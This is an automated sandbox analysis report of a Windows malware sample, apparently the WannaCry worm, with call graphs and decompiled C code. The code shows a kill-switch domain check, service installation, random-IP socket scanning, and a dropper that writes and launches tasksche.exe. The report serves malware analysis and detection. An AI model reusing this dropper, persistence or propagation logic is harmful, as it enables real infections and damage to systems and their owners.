            execution_graph 1027 401000 1032 401010 1027->1032 1038 408200 ??2@YAPAXI ??0_Lockit@std@@QAE 1032->1038 1034 401005 1035 409842 1034->1035 1046 409816 1035->1046 1037 40103a 1039 408246 1038->1039 1040 408259 ??1_Lockit@std@@QAE 1038->1040 1039->1040 1041 408274 1040->1041 1042 40827d ??2@YAPAXI 1040->1042 1045 4097fe free 1041->1045 1042->1034 1044 40827a 1044->1042 1045->1044 1047 40982b __dllonexit 1046->1047 1048 40981f _onexit 1046->1048 1047->1037 1048->1037 1098 407840 6 API calls 1099 407897 GetTickCount 1098->1099 1100 4078a6 GetTickCount 1099->1100 1102 4078a2 1099->1102 1100->1102 1101 407660 rand EnterCriticalSection CryptGenRandom LeaveCriticalSection 1101->1102 1102->1099 1102->1100 1102->1101 1116 407660 1102->1116 1104 40791d sprintf inet_addr 1119 407480 htons socket 1104->1119 1106 407a04 Sleep 1106->1099 1107 40795c GetTickCount 1108 407971 sprintf inet_addr 1107->1108 1109 407480 6 API calls 1108->1109 1110 407951 1109->1110 1110->1106 1110->1107 1110->1108 1111 4079e5 Sleep 1110->1111 1112 4079a5 _beginthreadex 1110->1112 1111->1110 1112->1110 1113 4079c2 WaitForSingleObject 1112->1113 1114 4079d5 TerminateThread 1113->1114 1115 4079de CloseHandle 1113->1115 1114->1115 1115->1111 1117 407672 EnterCriticalSection CryptGenRandom LeaveCriticalSection 1116->1117 1118 40766a rand 1116->1118 1117->1104 1118->1104 1120 4074e1 ioctlsocket connect select closesocket 1119->1120 1121 4074d6 1119->1121 1120->1110 1121->1110 1122 407540 inet_ntoa strncpy 1135 401980 inet_addr htons socket 1122->1135 1124 4075d4 Sleep 1125 401b70 16 API calls 1124->1125 1127 4075ec 1125->1127 1126 407596 Sleep 1151 401b70 inet_addr htons socket 1126->1151 1129 407609 _endthreadex 1127->1129 1196 4072a0 inet_addr htons socket 1127->1196 1131 4075b5 Sleep 1167 401370 1131->1167 1134 407587 1134->1124 1134->1126 1134->1131 1136 401b56 1135->1136 1137 4019dd connect 1135->1137 1136->1134 1138 401b50 closesocket 1137->1138 1139 4019f3 send 1137->1139 1138->1136 1139->1138 1140 401a0b recv 1139->1140 1140->1138 1141 401a26 send 1140->1141 1141->1138 1142 401a3e recv 1141->1142 1142->1138 1143 401a59 1142->1143 1211 4017b0 sprintf 1143->1211 1145 401a74 send 1145->1138 1146 401a8e recv 1145->1146 1146->1138 1147 401aa9 send 1146->1147 1147->1138 1148 401b08 recv 1147->1148 1148->1138 1149 401b1f 1148->1149 1149->1138 1150 401b3c closesocket 1149->1150 1150->1134 1152 401d68 1151->1152 1153 401bce connect 1151->1153 1152->1134 1154 401d62 closesocket 1153->1154 1155 401be4 send 1153->1155 1154->1152 1155->1154 1156 401bff recv 1155->1156 1156->1154 1157 401c1a send 1156->1157 1157->1154 1158 401c35 recv 1157->1158 1158->1154 1159 401c50 send 1158->1159 1159->1154 1160 401c80 recv 1159->1160 1160->1154 1161 401c9b send 1160->1161 1161->1154 1162 401cd6 recv 1161->1162 1162->1154 1163 401ced 1162->1163 1163->1154 1164 401d4d closesocket 1163->1164 1165 401cff send 1163->1165 1164->1134 1165->1154 1166 401d36 recv 1165->1166 1166->1154 1166->1164 1213 409860 1167->1213 1170 4013af 1215 4082c0 1170->1215 1172 4013cc GetTickCount 1173 4013ff _ftol 1172->1173 1195 4013c7 1172->1195 1224 401660 1173->1224 1175 401418 GetTickCount 1176 401433 inet_addr htons socket 1175->1176 1175->1195 1177 401470 connect 1176->1177 1178 40162a 1176->1178 1181 40163a closesocket 1177->1181 1177->1195 1250 401310 1178->1250 1179 408390 2 API calls 1183 4014d6 closesocket 1179->1183 1185 401640 1181->1185 1183->1195 1187 401310 closesocket 1185->1187 1186 40161f 1186->1134 1191 401645 Sleep 1187->1191 1188 408390 2 API calls 1189 40158e recv 1188->1189 1189->1185 1189->1195 1190 408390 2 API calls 1192 401540 send 1190->1192 1191->1134 1192->1185 1192->1195 1193 4015b8 _stricmp 1194 4015e4 _stricmp 1193->1194 1193->1195 1194->1195 1195->1172 1195->1175 1195->1179 1195->1186 1195->1188 1195->1190 1195->1193 1195->1194 1237 408390 1195->1237 1197 40746c 1196->1197 1198 4072fe connect 1196->1198 1197->1129 1199 407314 send 1198->1199 1200 407466 closesocket 1198->1200 1199->1200 1201 40732f recv 1199->1201 1200->1197 1201->1200 1202 40734a send 1201->1202 1202->1200 1203 407365 recv 1202->1203 1203->1200 1204 407380 send 1203->1204 1204->1200 1205 4073af recv 1204->1205 1205->1200 1206 4073ca send 1205->1206 1206->1200 1207 407418 recv 1206->1207 1207->1200 1208 40742f 1207->1208 1208->1200 1272 406f50 1208->1272 1212 40180d 1211->1212 1212->1145 1214 40137a GetTickCount 1213->1214 1214->1170 1216 4082d5 1215->1216 1219 408339 1215->1219 1216->1219 1222 4082e0 1216->1222 1217 408381 1217->1195 1218 40830f 1218->1195 1219->1217 1260 4085d0 1219->1260 1222->1218 1254 4089d0 1222->1254 1259 4097fe free 1222->1259 1225 40167c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 1224->1225 1226 4016a0 Sleep 1225->1226 1227 4016cb 1225->1227 1226->1195 1228 40171c _ftol QueryPerformanceCounter 1227->1228 1229 4016de QueryPerformanceFrequency 1227->1229 1230 401765 Sleep 1228->1230 1231 40176c QueryPerformanceCounter 1228->1231 1232 40170c 1229->1232 1233 4016ed Sleep 1229->1233 1230->1231 1234 401781 1231->1234 1235 4017a4 1231->1235 1232->1228 1233->1195 1234->1235 1236 40178b QueryPerformanceCounter 1234->1236 1235->1195 1236->1234 1236->1236 1238 4083af 1237->1238 1239 408552 1238->1239 1240 4083d4 1238->1240 1242 408583 1239->1242 1244 408560 1239->1244 1269 408db0 ??2@YAPAXI 1240->1269 1243 4085bc 1242->1243 1245 408a60 ??2@YAPAXI 1242->1245 1243->1195 1270 408a60 ??2@YAPAXI 1244->1270 1247 4085a8 1245->1247 1247->1195 1248 40856f 1248->1195 1249 4083de 1249->1195 1251 401365 1250->1251 1252 40131c closesocket 1250->1252 1251->1134 1253 401332 1252->1253 1253->1251 1253->1252 1255 4089e4 1254->1255 1256 408a05 1254->1256 1255->1256 1257 4089d0 free 1255->1257 1267 4097fe free 1255->1267 1256->1222 1257->1255 1259->1222 1262 4085e8 1260->1262 1261 40861f ??0_Lockit@std@@QAE 1266 408631 ??1_Lockit@std@@QAE 1261->1266 1262->1261 1265 4089b1 1265->1219 1268 4097fe free 1266->1268 1267->1255 1268->1265 1269->1249 1271 408a9c 1270->1271 1271->1248 1273 406f5a 1272->1273 1274 406fe4 GlobalAlloc 1273->1274 1275 407292 1274->1275 1284 406ffd 1274->1284 1275->1200 1276 4071c7 1277 407287 GlobalFree 1276->1277 1278 4071cf htons 1276->1278 1277->1275 1285 406f00 1278->1285 1280 407134 send 1280->1276 1282 407184 recv 1280->1282 1282->1276 1282->1284 1283 407272 recv 1283->1277 1284->1276 1284->1280 1286 406f1a send 1285->1286 1286->1277 1286->1283 1287 401040 1288 401050 1287->1288 1293 4010c2 1288->1293 1296 401071 1288->1296 1290 4010a0 1303 4097fe free 1290->1303 1291 4010ef ??0_Lockit@std@@QAE 1294 401111 1291->1294 1295 40111d ??1_Lockit@std@@QAE 1291->1295 1292 4089d0 free 1292->1296 1293->1290 1297 4085d0 3 API calls 1293->1297 1294->1295 1298 401131 1295->1298 1299 40112b 1295->1299 1296->1290 1296->1292 1302 4097fe free 1296->1302 1297->1293 1304 4097fe free 1299->1304 1302->1296 1303->1291 1304->1298 1305 408000 RegisterServiceCtrlHandlerA 1306 408052 SetServiceStatus 1305->1306 1307 40808c 1305->1307 1310 407bd0 1306->1310 1309 408079 Sleep ExitProcess 1321 407b90 WSAStartup 1310->1321 1312 407bd5 1313 407bd9 1312->1313 1314 407bda _beginthreadex 1312->1314 1313->1309 1315 407c02 CloseHandle 1314->1315 1316 407c05 1314->1316 1315->1316 1317 407c0d _beginthreadex 1316->1317 1318 407c24 CloseHandle 1317->1318 1319 407c27 Sleep 1317->1319 1318->1319 1319->1317 1320 407c37 1319->1320 1320->1309 1322 407bb2 1321->1322 1323 407ba9 1321->1323 1328 407620 1322->1328 1323->1312 1325 407bb7 1332 407a20 GlobalAlloc 1325->1332 1327 407bbc 1327->1312 1329 40762a CryptAcquireContextA 1328->1329 1330 407650 InitializeCriticalSection 1329->1330 1331 40764a 1329->1331 1330->1325 1331->1329 1331->1330 1333 407a56 1332->1333 1334 407a5d GlobalAlloc 1332->1334 1333->1327 1335 407a84 CreateFileA 1334->1335 1336 407a6f GlobalFree 1334->1336 1338 407af0 GlobalFree GlobalFree 1335->1338 1339 407b11 GetFileSize ReadFile 1335->1339 1336->1327 1338->1327 1340 407b62 CloseHandle 1339->1340 1341 407b3b CloseHandle GlobalFree GlobalFree 1339->1341 1340->1327 1341->1327 1342 407720 1354 409160 GetAdaptersInfo 1342->1354 1344 4077fa _endthreadex 1378 4097fe free 1344->1378 1346 4077c3 _beginthreadex 1350 4077f1 Sleep 1346->1350 1351 4077df InterlockedIncrement CloseHandle 1346->1351 1347 4077b3 Sleep 1347->1347 1349 40777e 1347->1349 1348 40780b 1379 4097fe free 1348->1379 1349->1344 1349->1346 1349->1347 1350->1349 1351->1350 1353 407821 1355 40917d 1354->1355 1356 4091ae 1354->1356 1355->1356 1357 409185 LocalAlloc 1355->1357 1356->1349 1357->1356 1358 409198 GetAdaptersInfo 1357->1358 1359 4091b5 1358->1359 1360 4091a7 LocalFree 1358->1360 1361 4091d6 inet_addr inet_addr 1359->1361 1362 409389 1359->1362 1366 4092a1 GetPerAdapterInfo 1359->1366 1367 409249 inet_addr 1359->1367 1370 40935e LocalFree 1359->1370 1371 4092f9 inet_addr 1359->1371 1372 40926c htonl htonl htonl htonl 1359->1372 1375 4090d0 htonl htonl htonl htonl 1359->1375 1376 409329 htonl htonl htonl htonl 1359->1376 1380 408e50 htonl htonl 1359->1380 1386 409470 1359->1386 1393 409110 htonl 1359->1393 1360->1356 1361->1359 1364 409448 LocalFree 1362->1364 1364->1349 1366->1359 1368 4092bd LocalAlloc 1366->1368 1367->1359 1369 4092d8 GetPerAdapterInfo 1368->1369 1368->1370 1369->1359 1369->1370 1370->1359 1371->1359 1373 408e50 5 API calls 1372->1373 1373->1359 1375->1359 1377 408e50 5 API calls 1376->1377 1377->1359 1378->1348 1379->1353 1381 408e80 1380->1381 1382 40902a 1380->1382 1381->1382 1383 408e9d htonl 1381->1383 1384 408eee ??2@YAPAXI 1381->1384 1395 4097fe free 1381->1395 1382->1359 1383->1381 1384->1381 1387 40959a 1386->1387 1389 409494 ??2@YAPAXI 1386->1389 1387->1359 1391 4094e2 1389->1391 1396 4097fe free 1391->1396 1392 40954e 1392->1359 1394 409121 1393->1394 1394->1359 1395->1381 1396->1392 1397 409b68 _exit 1398 4081d0 1401 4097fe free 1398->1401 1400 4081e1 1401->1400 1402 407f30 1403 407f74 SetServiceStatus 1402->1403 1404 407f3a 1402->1404 1404->1403 1405 4076b0 1406 407480 6 API calls 1405->1406 1407 4076bb 1406->1407 1408 407702 InterlockedDecrement _endthreadex 1407->1408 1409 4076c2 _beginthreadex 1407->1409 1409->1408 1410 4076df WaitForSingleObject 1409->1410 1411 4076f2 TerminateThread 1410->1411 1412 4076fb CloseHandle 1410->1412 1411->1412 1412->1408 1049 409a16 __set_app_type __p__fmode __p__commode 1050 409a85 1049->1050 1051 409a99 1050->1051 1052 409a8d __setusermatherr 1050->1052 1061 409b8c _controlfp 1051->1061 1052->1051 1054 409a9e _initterm __getmainargs _initterm 1056 409af2 GetStartupInfoA 1054->1056 1057 409b26 GetModuleHandleA 1056->1057 1062 408140 InternetOpenA InternetOpenUrlA 1057->1062 1060 409b4a exit _XcptFilter 1061->1054 1063 4081a7 InternetCloseHandle InternetCloseHandle 1062->1063 1064 4081bc InternetCloseHandle InternetCloseHandle 1062->1064 1067 408090 GetModuleFileNameA __p___argc 1063->1067 1064->1060 1066 4081b2 1066->1060 1068 4080b0 1067->1068 1069 4080b9 OpenSCManagerA 1067->1069 1078 407f20 1068->1078 1071 408101 StartServiceCtrlDispatcherA 1069->1071 1072 4080cf OpenServiceA 1069->1072 1071->1066 1074 4080fc CloseServiceHandle 1072->1074 1075 4080ee 1072->1075 1074->1071 1083 407fa0 ChangeServiceConfig2A 1075->1083 1077 4080f6 CloseServiceHandle 1077->1074 1084 407c40 sprintf OpenSCManagerA 1078->1084 1080 407f25 1089 407ce0 GetModuleHandleW 1080->1089 1083->1077 1085 407c74 CreateServiceA 1084->1085 1086 407cca 1084->1086 1087 407cbb CloseServiceHandle 1085->1087 1088 407cad StartServiceA CloseServiceHandle 1085->1088 1086->1080 1087->1080 1088->1087 1090 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1089->1090 1097 407e49 1089->1097 1091 407d49 1090->1091 1090->1097 1092 407d69 FindResourceA 1091->1092 1091->1097 1093 407d84 LoadResource 1092->1093 1092->1097 1094 407d94 LockResource 1093->1094 1093->1097 1095 407da7 SizeofResource 1094->1095 1094->1097 1096 407db9 sprintf sprintf MoveFileExA 1095->1096 1095->1097 1096->1097 1097->1066

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_00407840 27 Function_00407660 0->27 36 Function_00407480 0->36 1 Function_00407540 31 Function_00401370 1->31 32 Function_00401B70 1->32 38 Function_00401980 1->38 62 Function_004072A0 1->62 2 Function_00408140 49 Function_00408090 2->49 3 Function_00409040 4 Function_00401140 5 Function_00401040 11 Function_004085D0 5->11 15 Function_004089D0 5->15 34 Function_004097FE 5->34 45 Function_00408A10 5->45 65 Function_004082B0 5->65 6 Function_00407C40 7 Function_004082C0 7->11 7->15 7->34 64 Function_00408D30 7->64 8 Function_00409BC0 9 Function_00409842 54 Function_00409816 9->54 10 Function_00408D50 11->34 11->45 12 Function_00408DD0 13 Function_00408E50 13->3 20 Function_00409050 13->20 13->34 41 Function_00409080 13->41 67 Function_004090B0 13->67 14 Function_004081D0 14->34 15->15 15->34 16 Function_00408CD0 17 Function_00407BD0 52 Function_00407B90 17->52 18 Function_004090D0 19 Function_00409750 21 Function_00406ED0 22 Function_00406F50 23 Function_00409860 22->23 35 Function_00406F00 22->35 24 Function_00408A60 68 Function_00408E30 24->68 25 Function_00409960 26 Function_00401660 26->25 61 Function_004098A0 26->61 28 Function_00409160 28->13 28->18 28->19 33 Function_00409470 28->33 42 Function_00409680 28->42 46 Function_00409110 28->46 29 Function_00407CE0 30 Function_00409B68 31->7 31->23 31->26 37 Function_00401D80 31->37 48 Function_00401310 31->48 50 Function_00401190 31->50 51 Function_00408390 31->51 33->34 71 Function_004017B0 38->71 39 Function_00401000 39->9 47 Function_00401010 39->47 40 Function_00408200 40->34 42->42 43 Function_00408000 43->17 44 Function_00409B8C 47->40 56 Function_00407F20 49->56 60 Function_00407FA0 49->60 50->4 51->10 51->12 51->16 51->24 51->68 70 Function_00408DB0 51->70 57 Function_00407620 52->57 59 Function_00407A20 52->59 53 Function_00409A16 53->2 53->44 63 Function_00409BA1 53->63 55 Function_00409B9E 56->6 56->29 58 Function_00407720 58->28 58->34 62->21 62->22 72 Function_00406EB0 62->72 66 Function_00409BB0 69 Function_00407F30 71->4 73 Function_004076B0 73->36 74 Function_00409BB8

            Executed Functions

            Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 71%
            			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























            0x00409a19
            0x00409a1b
            0x00409a20
            0x00409a2b
            0x00409a2c
            0x00409a39
            0x00409a3e
            0x00409a43
            0x00409a4a
            0x00409a51
            0x00409a64
            0x00409a72
            0x00409a7b
            0x00409a80
            0x00409a85
            0x00409a8b
            0x00409a92
            0x00409a98
            0x00409a99
            0x00409a9e
            0x00409aa3
            0x00409aa8
            0x00409ab2
            0x00409acb
            0x00409ad1
            0x00409ad6
            0x00409adb
            0x00409ae8
            0x00409aea
            0x00409af0
            0x00409b2c
            0x00409b31
            0x00409b32
            0x00409b32
            0x00409af2
            0x00409af2
            0x00409af2
            0x00409af3
            0x00409af6
            0x00409af8
            0x00409b03
            0x00409b05
            0x00409b05
            0x00409b06
            0x00409b06
            0x00409b03
            0x00409b09
            0x00409b0d
            0x00000000
            0x00000000
            0x00409b13
            0x00409b1a
            0x00409b24
            0x00409b39
            0x00409b26
            0x00409b26
            0x00409b26
            0x00409b3a
            0x00409b3b
            0x00409b3c
            0x00409b44
            0x00409b45
            0x00409b4a
            0x00409b4e
            0x00409b54
            0x00409b59
            0x00409b5b
            0x00409b5e
            0x00409b5f
            0x00409b60
            0x00409b67

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53networkCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 74%
            			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t14;
				void* _t28;
				void* _t30;

				_t12 = memcpy( &_v80, "http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t30 = _t13;
				_t14 = InternetOpenUrlA(_t30,  &_v100, 0, 0, 0x84000000, 0); // executed
				_t28 = _t14;
				_push(_t30);
				if(_t28 != 0) {
					InternetCloseHandle(); // executed
					InternetCloseHandle(_t28);
					return 0;
				} else {
					InternetCloseHandle();
					InternetCloseHandle(0);
					E00408090();
					return 0; // executed
				}
			}

















            0x00408155
            0x00408157
            0x00408158
            0x0040815c
            0x00408160
            0x00408164
            0x00408168
            0x0040816c
            0x00408177
            0x0040817b
            0x0040818e
            0x00408194
            0x0040819a
            0x0040819c
            0x004081a5
            0x004081bc
            0x004081bf
            0x004081c8
            0x004081a7
            0x004081a7
            0x004081ab
            0x004081ad
            0x004081b9
            0x004081b9

            APIs
            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
            • InternetCloseHandle.WININET(00000000), ref: 004081A7
            • InternetCloseHandle.WININET(00000000), ref: 004081AB
              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
            • InternetCloseHandle.WININET(00000000), ref: 004081BC
            • InternetCloseHandle.WININET(00000000), ref: 004081BF
            Strings
            • http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Internet$CloseHandle$Open$FileModuleName__p___argc
            • String ID: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            • API String ID: 2010709392-3122308260
            • Opcode ID: ec133b43de4331460eff2a0b2c8cd404513b79e1c5a5deea9d12a904249ad51c
            • Instruction ID: e18cae5e57e59901b1837d80ae8654563a660de2be6bc36b6f573cb3739cdf66
            • Opcode Fuzzy Hash: ec133b43de4331460eff2a0b2c8cd404513b79e1c5a5deea9d12a904249ad51c
            • Instruction Fuzzy Hash: AB0175719043206EE310EF749C01BAF7BE9EF85750F01042FF984E6280EAB5981487A7
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409816 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 26 409816-40981d 27 40982b-409841 __dllonexit 26->27 28 40981f-40982a _onexit 26->28
            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: __dllonexit_onexit
            • String ID:
            • API String ID: 2384194067-0
            • Opcode ID: 0781ed1b29e21d9fd6ecb5fca695af29cf14ef0124ca815a7394de4f342490fd
            • Instruction ID: 32c58c291263a65dfadb3e1ea53c98eec5aa450420fab8ef346d5ac4251156bf
            • Opcode Fuzzy Hash: 0781ed1b29e21d9fd6ecb5fca695af29cf14ef0124ca815a7394de4f342490fd
            • Instruction Fuzzy Hash: AAC0C971448301EACA246B10BC068D977A1E652736BA4C779F069309F1D7391864A506
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 30 407ce0-407cfb GetModuleHandleW 31 407d01-407d43 GetProcAddress * 4 30->31 32 407f08-407f14 30->32 31->32 33 407d49-407d4f 31->33 33->32 34 407d55-407d5b 33->34 34->32 35 407d61-407d63 34->35 35->32 36 407d69-407d7e FindResourceA 35->36 36->32 37 407d84-407d8e LoadResource 36->37 37->32 38 407d94-407da1 LockResource 37->38 38->32 39 407da7-407db3 SizeofResource 38->39 39->32 40 407db9-407e4e sprintf * 2 MoveFileExA 39->40 40->32 42 407e54-407ef0 40->42 42->32 46 407ef2-407f01 42->46 46->32
            C-Code - Quality: 36%
            			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x0
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x0
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






























            0x00407cf5
            0x00407cfb
            0x00407d15
            0x00407d22
            0x00407d2f
            0x00407d34
            0x00407d36
